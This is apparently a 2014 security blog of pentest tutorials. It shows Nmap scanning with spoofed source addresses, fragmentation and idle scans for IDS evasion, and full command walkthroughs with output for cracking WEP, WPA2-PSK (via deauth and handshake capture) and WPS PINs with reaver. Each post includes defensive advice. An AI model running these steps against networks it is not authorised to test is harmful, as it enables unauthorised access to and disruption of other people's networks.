17 February 2014

Using NMap to enumerate network devices

1. Some background info
NMap is a free utility for network discovery and security auditing. Initially designed as better replacement to ping, it has grown into a full-fledged network auditing framework which can discover devices, what services and OS versions are running, what firewalls/IDS/IPS are in place and even conduct exploitations or DoS attacks thanks to its flexible scripting engine. More about NMap and what it can do here.

2. The task
We will use various NMap scan techniques to discover targets in our network, what ports they have open and what services are listening on those ports.

3. Requirements
- a laptop/PC running NMap. You can get NMap here for whatever platform you are running. Alternatively you can use a pentest distribution like Kali.
- a target. You can use another computer from your network or a virtual machine. I use Metasploitable. You can get and find more about it here. I advise you to get it as we're going to use it as a target for future lessons.
Please ensure you have permission to scan the target. While port scanning by itself is not illegal in most countries it can be annoying and even dangerous (services on target could crash because of it). Also some ISPs don't take kindly to it so you might end up losing your internet subscription.
My advice: use a virtual machine.

4. Let's begin
Open a command prompt/terminal and execute

nmap

You will get a list of the various arguments NMap can be run with. NMap has a GUI as well but today we're going to use the command prompt. You can scan a range of IPs using this command:

  nmap 192.168.100.1-200

The command above will scan all IPs from 192.168.100.1 to 192.168.100.200. There are many other options for IP ranges. Let's say we found a live target at 192.168.100.102. By default, when we only pass a target/range of targets NMap sends an ICMP echo request, a TCP SYN packet on port 443, a TCP ACK packet on port 80 and an ICMP timestamp request. We can use arguments to change this.
The following command only sends a TCP ACK packet to port 80 skipping ping.

nmap -p80 -sA -Pn 192.168.100.102

This is a much quieter scan but a packet sniffer/IDS/IPS on the target can see our attempt. Fortunately NMap allows us to spoof our IP address. The following command uses fragmentation to evade IDS/IPS and IP spoofing to make it look as if someone else was doing the scan:

nmap -p80 -sA -Pn -f -S 192.168.100.101 -e eth0 192.168.100.102

The command makes it look as if 192.168.100.101 was doing the scan. There is also another way. It's called Idle scan or zombie scan. For this approach we need another live device in the network which is idle and has an open port. The following command uses 192.168.100.101 which has port 2869 open to scan port 80 on target 192.168.100.102:

nmap -p80 -Pn -sI 192.168.100.101:2869 192.168.100.102

NMap can do more than just scanning ports. The next command will try to discover what OS is running on the target:

nmap -O -Pn 192.168.100.102

For OS scan to be reliable the target needs to have at least one open port and one closed port.
NMap has a lot more to offer. We barely scratched the surface. You can begin by studying and doing the examples from NMap Reference Guide.
A great book to have related to NMap is Nmap 6: Network exploration and security auditing Cookbook.
A good idea is to setup Wireshark on your target so you can see how each scan that you do looks like and what it does. You can get some sample captures I made from here.

5. Alternatives
Hping utility is a good alternative. It comes with a lot of features and, just like NMap, you can extend functionality through TCL scripts (NMap uses a flavour of Lua).

6. How to defend
You can't prevent port scanning but then again port scanning by itself is not dangerous. What you can do is limit the information a port scanner like NMap can get from you. Always use a firewall and never open ports unless you really need them to. You can also configure an IPS/IDS and monitor the activity though I haven't found one to get to work easily out of the box for personal use. You can also have Wireshark setup for intrusion detection.

7. What's next?
We now have a target. We know some basic info about it like what ports are open, what services are using those ports and the OS. It is time to find a weakness and exploit it and that's what we'll do next time.

06 February 2014

New tools of the trade - Kali pentest distribution

After encountering some issues configuring and running Metasploit framework on BackTrack 5 R3 in a virtual machine, I have decided to finally make the switch to Kali.

So far, the decision was good. Kali runs fine both in virtual machine and as a live USB stick. The interface is nice and sleek if not a bit too dark and lacking any colors. But it's customizable so it's not a real issue.
I also like the new "Start" menu and how applications are arranged. It's easier to navigate than BackTrack.

The Top 10 Security tools is also a nice addition and lists the best tools you can use like the Metasploit framework for all your exploitation needs, Aircrack-ng for testing and penetrating wireless networks, Wireshark for analyzing network traffic, Nmap for discovering targets and their weak spots and some others just as useful.

Everything runs good without unexpected errors or other anomalies. Instalation is very straightforward, has an intuitive GUI and provides all sorts of neat options (like encrypting the drive).

You can get Kali and read more about it here.

30 January 2014

Cracking WPA using BackTrack (WPS attack)

1. Some background info
WPS stands for Wireless Protected Setup and it's a protocol designed for simplifying the process of connecting clients to wireless networks. Routers provide clients with an 8 digits PIN code for clients to use to connect. Some also have a button which you can press when a client tries to connect to have it connected automatically without requiring the client to enter a key or PIN.

2. The task
In this post we will crack a WPA2-PSK encrypted access point which has WPS enabled and get the key and PIN. For cracking WPA2-PSK with a different method see this post.

3. Requirements
- a laptop/PC with a wireless card that supports packet injection. Check on the Internet if your wireless card model supports this function;
- BackTrack 5, either as a live CD, live USB or installed on your computer. You can get the latest BackTrack image here;
- a wireless access point configured to use WPA2-PSK encryption which support WPS and has it enabled;

4. Let's begin
Open a terminal window.
First things first, we need to enable monitoring mode for our wireless card.

   airmon-ng start wlan0

Now that our wireless card is properly setup, let's find our network. The following command will enumerate the wireless access points and clients in range and also provide us with useful information:

   airodump-ng mon0

The output is something like this:

 CH 13 ][ Elapsed: 4 s ][ 2014-01-29 14:08                                      
                                                                                             
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID              
                                                                                               
 80:1F:02:4B:F9:5C  -45        8        0    0  11  54e  WPA2 CCMP   PSK  Edimax AP          
 10:BF:48:92:A2:80  -87        5        0    0   1  54e  WPA2 CCMP   PSK  ASUS                
                                                                                               
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                    
                                                                                               
 80:1F:02:4B:F9:5C  60:D8:19:A7:33:21  -50    0 - 5e     0        1                            

The above output shows us that there are two access points in range, Edimax AP and ASUS, both using WPA2-PSK encryption. We don't know yet if our target, Edimax AP, has WPS enabled. Let's stop airodump-ng and use wash to check our target:

   wash -i mon0 -c 11

We're checking all access points using channel 11. In our case Edimax AP appears to have WPS enabled (output will come soon, forgot to save it).

If you're getting an error that wash cannot get to channel 11 it's because airodump-ng hops on channels and interface's channel remains set to whatever the channel airodump-ng was on when stopped. Run this command to have your interface switched to channel 11:

   airodump-ng --channel 11 mon0

Time to try and attack it. For that we'll use reaver. Reaver attempts to associate with the target AP then begins a brute-force attack, trying out each PIN combination. Because of the way WPS is designed, although it has 8 digits, there are only 11.000 possible combinations. Assuming the correct PIN is not the last one reaver tries, there will be a lot fewer attempts before the correct pin is found. Let's fire up reaver and see what comes up:

   reaver -i mon0 -b 80:1F:02:4B:F9:5C -vv

The output will start flowing:

[+] Waiting for beacon from 80:1F:02:4B:F9:5C
[+] Switching mon0 to channel 11
[+] Associated with 80:1F:02:4B:F9:5C (ESSID: Edimax AP)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00005678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
...and so on

Quick note: with some routers reaver will not be able to associate. In this case we can use aireplay-ng and tell reaver not to attempt association. You might also need to have aireplay-ng trying to associate constantly. It all depends on the AP model and how its firmware works. You need to play around and experiment. The following commands will associate using aireplay:

   aireplay-ng --fakeauth 30 -e "Edimax AP" mon0

And to tell reaver that we are associating through some other application:

   reaver -i mon0 -A -b 80:1F:02:4B:F9:5C -vv

After a while, if everything is ok you will get this:

[+] Trying pin 63442519
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 678 seconds
[+] WPS PIN: '63442519'
[+] WPA PSK: 'Test1234'
[+] AP SSID: 'Edimax AP'

Congratulations, you have just cracked the key and the PIN.

5. Alternatives
BackTrack also comes with Fern WIFI Cracker(Exploitation Tools->Wireless Exploitation Tools->WLAN Exploitation->Fern-wifi-cracker-ng) which has a nice GUI for finding targets and attacking them.

6. How to defend
Defending against this attack should be as simple as disabling WPS. However some routers/APs keep WPS enabled even if you disable it from the settings and what's worse is that they also respond to reaver's requests. Here is a list of various router models and how vulnerable they are to this attack.

7. What's next?
Now that we gained access to the network it's time to explore it. In the next post we'll see how to discover targets and get information about them.

Cracking WPA encryption using BackTrack (dictionary attack)

1. Some background info
WPA stands for WiFi Protected Access and is a security protocol for protecting wireless networks. WPA and WPA2 have been developed in response to the serious weaknesses discovered in WEP. For information on how to crack WEP encrypted access points see this post.

2. The task
In this post we will crack a WPA2 encrypted access point which uses a preshared key. For that we will use BackTrack, our trusty pentesting distribution.

3. Requirements
- a laptop/PC with a wireless card that supports packet injection. Check on the Internet if your wireless card model supports this function;
- BackTrack 5, either as a live CD, live USB or installed on your computer. You can get the latest BackTrack image here;
- a wireless access point configured to use WPA2-PSK encryption;
- a client connected to the access point (another laptop/smartphone/etc.)

4. Let's begin
Open a terminal window.
First things first, we need to enable monitoring mode for our wireless card.

airmon-ng start wlan0

Now that our wireless card is properly setup, let's find our network. The following command will enumerate the wireless access points and clients in range and also
provide us with useful information

airodump-ng mon0

The output is something like this:

 CH 13 ][ Elapsed: 4 s ][ 2014-01-29 14:08                                      
                                                                                             
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID              
                                                                                               
 80:1F:02:4B:F9:5C  -45        8        0    0  11  54e  WPA2 CCMP   PSK  Edimax AP          
 10:BF:48:92:A2:80  -87        5        0    0    1  54e  WPA2 CCMP   PSK  ASUS                
                                                                                               
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                    
                                                                                               
 80:1F:02:4B:F9:5C  60:D8:19:A7:33:21  -50    0 - 5e     0        1                            

The above output shows us that there are two access points in range, Edimax AP and ASUS, both using WPA2-PSK encryption.
We can also see that there is a wireless client with MAC address D8:50:E6:20:D1:07 being connected to our target (MAC 80:1F:02:4B:F9:5C).
We're going to need that client to get the relevant packet which we're going to crack and get the key from.

Now that we know our target it's time to get to work. We're going to have airodump-ng capture packets from our target and write them to a .cap file.
The following command will do it

airodump-ng -w EdimaxCapture --bssid 80:1F:02:4B:F9:5C --channel 11 mon0

The idea here is to catch the so-called handshake. The handshake represents a set of messages exchanged between the client and the access point which finalize with the client being authenticated (assuming he has the right key). The thing is the handshake only occurs when a client first connects to the access point. So we have two options. We either wait for a new client to connect (neah) or we could simply disconnect a connected client and let them attempt to reconnect. Since the second option sounds more interesting, let's do that. We're going to use aireplay-ng to send a deauth packet to the client.
Let's open a new terminal window and run this command:

aireplay-ng -a 80:1F:02:4B:F9:5C -c 60:D8:19:A7:33:21 --deauth 4 mon0

So we've send 4 deauth packets to the client connected to the target. Time to get back to our terminal window capturing the packets and see if anything interesting was caught:

 CH 11 ][ Elapsed: 9 mins ][ 2014-01-29 14:25 ][ WPA handshake: 80:1F:02:4B:F9:5C            
                                                                                             
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID          
                                                                                             
 80:1F:02:4B:F9:5C  -39 100     5378     1155    2  11  54e  WPA2 CCMP   PSK  Edimax AP      
                                                                                             
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                    
                                                                                             
 80:1F:02:4B:F9:5C  60:D8:19:A7:33:21  -127    1e- 0e     0      655                          

Aha, seems like we caught a handshake for our target. Look at the top-right part of the output.
Now that we caught it we can stop this and start the actual cracking.

We are going to use a dictionary attack to attempt to find the password. This dictionary is merely a text file which contains a string on each line. This is where the tricky part comes. For our attack to be succesful, the key must be one of those strings. The internet is full of wordlists which you can try to use to crack a password. For the purpose of this tutorial I created a small wordlist which also contains the key for the access point.
Let's run the following command and see what comes up:

aircrack-ng -w wordlist.txt -a 2 -b 80:1F:02:4B:F9:5C EdimaxCapture-02.cap

One quick note: even though the -w argument for airodump-ng was EdimaxCapture, it created EdimaxCapture-02.cap. If you get an error when running aircrack saying that it cannot find the file, use the ls command to see what files are in the current folder.

If aircrack finds the key it will output this:

                                 Aircrack-ng 1.1 r2178


                   [00:00:00] 6 keys tested (403.00 k/s)


                           KEY FOUND! [ Test1234 ]


      Master Key     : 0C 21 E6 27 23 1E AD 61 B5 29 BD FE 74 A0 89 C7
                       D4 77 88 92 78 D1 6D DD A8 4F 79 4A 34 32 1A 4D

      Transient Key  : BC 29 70 E1 CF 79 11 13 A8 BC 6A 5B 38 7E D8 C8
                       5F B0 51 24 51 A0 D8 6E C3 1E 8B 24 53 DD F6 A7
                       DF B1 71 6D 27 C5 23 55 9A 7C 17 4D C0 AC B2 27
                       BC 9E 72 98 C6 0E D2 6A 0E 22 49 16 19 CD 99 31

      EAPOL HMAC     : 30 0F 90 38 7C C2 21 4F 6A 2E 30 48 30 74 2C F6

Congratulations, you have just cracked the key.

5. Alternatives
BackTrack also provides other applications for cracking WPA. The most notable is Gerix (Exploitation Tools->Wireless Exploitation Tools->WLAN Exploitation->Gerix-wifi-cracker-ng) which offers an intuitive GUI and point-and-click navigation. Play around and experiment.

6. How to defend
This attack is easy to fend off because it relies on guessing the key. So use something that's hard to guess. An 8 characters key with upper and lower case characters, symbols and numbers would be impossible to crack with this attack. More characters, better protection. Just don't go nuts with really long ones. I consider a 16 characters key to be more than enough (something like d!4PfY#cM&35zt@5).

7. What's next?
There is however a way to crack a WPA2-PSK encrypted access point no matter how strong the key is and that is through WPS (WiFi Protected Setup). We will cover this attack in the next post.

29 January 2014

BackTrack and Kali

As of January 2014 (maybe earlier, but it's when I found out) BackTrack  is no longer maintained. Offensive Security, its creators, are now focusing their efforts on Kali, a pentesting suite similar to BackTrack.
You can read more about Kali here.
Among the most notable changes those that I'm most excited about are the transition to Debian and the ARM support which increases portability even more.

28 January 2014

Cracking WEP encryption using BackTrack

1. Some background info
WEP stands for Wired Equivalent Privacy and is a security algorithm for protecting wireless networks. The algorithm has been proved to be flawed and easily broken, which is why in 2003 it has been superseded by WPA (WiFi Protected Access).

2. The task
In the following post I will show you how to crack a WEP encrypted access point and get the key using BackTrack.

3. Requirements
- a laptop/PC with a wireless card that supports packet injection. Check on the Internet if your wireless card model supports this function;
- BackTrack 5, either as a live CD, live USB or installed on your computer. You can get the latest BackTrack image here;
- a wireless access point configured to use WEP encryption;
 - a client for the wireless network (another laptop/mobile phone/etc.);

4. Let's begin
Open a terminal window.
First things first, we need to enable monitoring mode for our wireless card. While it is not mandatory I prefer to use it this way. Read more about it here.

  airmon-ng start wlan0

Now that our wireless card is properly setup, let's find our network. The following command will enumerate the wireless access points and clients in range and also
provide us with useful information

airodump-ng mon0

The output is something like this:
-------------------------------------------------------------
CH  3 ][ Elapsed: 12 s ][ 2014-01-27 16:29                                      
                                                                                           
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID            
                                                                                           
 80:1F:02:4B:F9:5C  -33        7        0    0  11  54   WEP  WEP         Edimax AP        
 10:BF:48:92:A2:80  -84       11        1    0   1  54e  WPA2 CCMP   PSK  ASUS              
                                                                                           
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                  
                                                                                           
 80:1F:02:4B:F9:5C  D8:50:E6:20:D1:07  -84    0 -11     41      113  
-------------------------------------------------------------

The above output shows us that there are two access points in range, Edimax AP, our target, with WEP encryption and ASUS, a WPA2 encrypted access point.
We can also see that there is a wireless client with MAC address D8:50:E6:20:D1:07 being connected to our target (MAC 80:1F:02:4B:F9:5C).
This is good as it is usually faster to get the encryption key when there are clients connected.

Now that we know our target we need to make a fake authentication with it. This will allow us to communicate with our target. The following command does just that

aireplay-ng -1 0 -a 80:1F:02:4B:F9:5C -h 84:4b:f5:6a:6b:83 -e "Edimax AP" mon0

The output should read "Association was succesful :)" on the last line. If it doesn't then you need to experiment with aireplay-ng various options. This depends on the access point
you are attacking.


Now that we are authenticated and associated with our target time to begin the actual attack. Aireplay-ng offers many options and attack vectors against access points and clients as well. For the full set of options just type aireplay-ng in the terminal and hit enter. For now we used the fake authentication to enable a communication channel with the target.
We will now use option 3, standard ARP-request replay. What we'll do is capture the communication made by the access point with its clients which we'll then use to get the key.
So, let's capture.

aireplay-ng -3 -b 80:1F:02:4B:F9:5C -h 84:4b:f5:6a:6b:83 mon0

We are now capturing data. If you look at the output you will see a line which says "Captured packets saved to arp_replay_[some number].cap". That's the file we're going to work with.
You will also in the output that we are advised to start airodump-ng to capture packets as well. So, let's leave this running, open another terminal window and run airodump-ng.

airodump-ng -c 11 -w capture --bssid 80:1F:02:4B:F9:5C mon0

This will capture packets in a capture.cap file. We need to leave this running for a while. How long depends on how much traffic there is through the access point. Let's wait five minutes for a start. Now, for the final step, we'll use aircrack-ng to strip the key from the captured packets.

aircrack-ng -b 80:1F:02:4B:F9:5C replay-arp-[some number].cap capture.cap

Now aircrack will attempt to get the key from our capture files. Let's look at the output. What we're interested in is the first line, "Tested keys XXXXXXXX [some number IVs]". For a cracking to be succesful we need to have as many IVs as possible. The more packets we capture the more IVs we'll have and the higher the chances of a succesful crack.
If in the output of aircrack-ng you get informed that it failed, wait some more then run the above command again.

At one point aircrack-ng will output "!!!!KEY FOUND: ThisIsAWEPKey", or "KEY FOUND" and a hex number. They're both just as valid. Congratulations, you have just cracked the key.

5. Alternatives
As said before, aireplay-ng is very versatile. Using option 6 (the caffe-latte attack) you can target a client instead of the access point. The best part is you can direct such an attack to a client even if it's not connected to the access point. Windows clients (and not just, I also found Android to do the same) send packets in an attempt to connect to the access points they have saved/in the preferred list. These are the packets Caffe-Latte captures for aircrack to do its job.
BackTrack also provides other applications for cracking WEP. The most notable is Gerix (Exploitation Tools->Wireless Exploitation Tools->WLAN Exploitation->Gerix-wifi-cracker-ng) which offers an intuitive GUI and point-and-click navigation. Play around and experiment.

6. How to defend
The best way to defend against such an attack is to not use WEP. Use WPA with a proper key (upper and lower case characters, numbers and symbols) if you want real security.

7. What's next?
While WPA is much more secure, it is still not impossible to break it. The next post will cover cracking a WPA preshared key using a brute force dictionary attack.